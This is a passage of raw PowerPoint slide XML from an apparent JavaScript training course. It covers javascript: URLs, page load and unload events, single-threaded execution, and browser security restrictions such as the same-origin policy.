                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="660E7A"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A7A43"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>about:blank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>'); void 0;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>    Open Window</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1840709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a:t>Execution of JavaScript Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There is no formal definition of a program in client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript program consists of all the JavaScript code in a web page (inline scripts, HTML event handlers, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: URLs) along with external JavaScript code referenced with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of a &lt;script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All of these separate bits of code share a single global Window </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>see the same Document object, and they share the same set of global functions and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>variables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a script defines a new global variable or function, that variable or function will be visible to any JavaScript code that runs after the script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>does</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2391852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a:t>Execution of JavaScript Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript program execution occurs in two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>phases:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>document content is loaded and the code from &lt;script&gt; elements (both inline scripts and external scripts) is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The second phases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is asynchronous and event-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>driven</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When all such </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>finishes loading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.readyState</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>property changes to “complete” and the web browser fires a load event on the Window </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>object</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>be added as an attribute of the &lt;body&gt; tag or via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After that phase </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() will be rewrite the document </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>completely</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="877259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a:t>Execution of JavaScript Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> event is raised when the window is unloading its content and resources. The resources removal is processed after the unload event </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>occurs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="243E79"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>event can be used for cleaning up and releasing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>resources</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="243E79"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2877714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WEB-007 JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript in Web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 14"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>ver. 1.0</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28151899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a:t>Execution of JavaScript Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The core JavaScript language does not contain any threading mechanism, and client-side JavaScript has traditionally not defined any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>either</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single-threaded execution makes for much simpler scripting: you can write code with the assurance that two event handlers will never run at the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can manipulate document content knowing that no other thread is attempting to modify it at the same time, and you never need to worry about locks, deadlock, or race conditions when writing JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Single-threaded execution means that web browsers must stop responding to user input while scripts and event handlers are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>executing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript scripts and event handlers must not run for too </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>long</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="831029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a:t>JavaScript Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The introduction of JavaScript interpreters into web browsers means that loading a web page can cause arbitrary JavaScript code to be executed on your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>computer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web browsers’ first line of defense against malicious code is that they simply do not support certain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>capabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-side JavaScript does not provide any way to write or delete arbitrary files or list arbitrary directories on the client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>computer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-side JavaScript does not have any general-purpose networking capabilities. General-purpose Internet clients and servers cannot be written in client-side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="944975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a:t>JavaScript Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers’ second line of defense against malicious code is that they impose restrictions on the use of certain features that they do support. The following are some restricted features</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A JavaScript program can open new browser windows, but, to prevent pop-up abuse by advertisers, most browsers restrict this feature so that it can happen only in response to a user-initiated event, such as a mouse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>click</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A JavaScript program can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>close </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser windows that it opened itself, but it is not allowed to close other windows without user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>confirmation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value property of HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FileUpload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> elements cannot be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1028683" lvl="1" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>script cannot read the content of documents loaded from different servers than the document that contains the script. Similarly, a script cannot register event listeners on documents from different servers. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>restriction is known as the same-origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>policy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
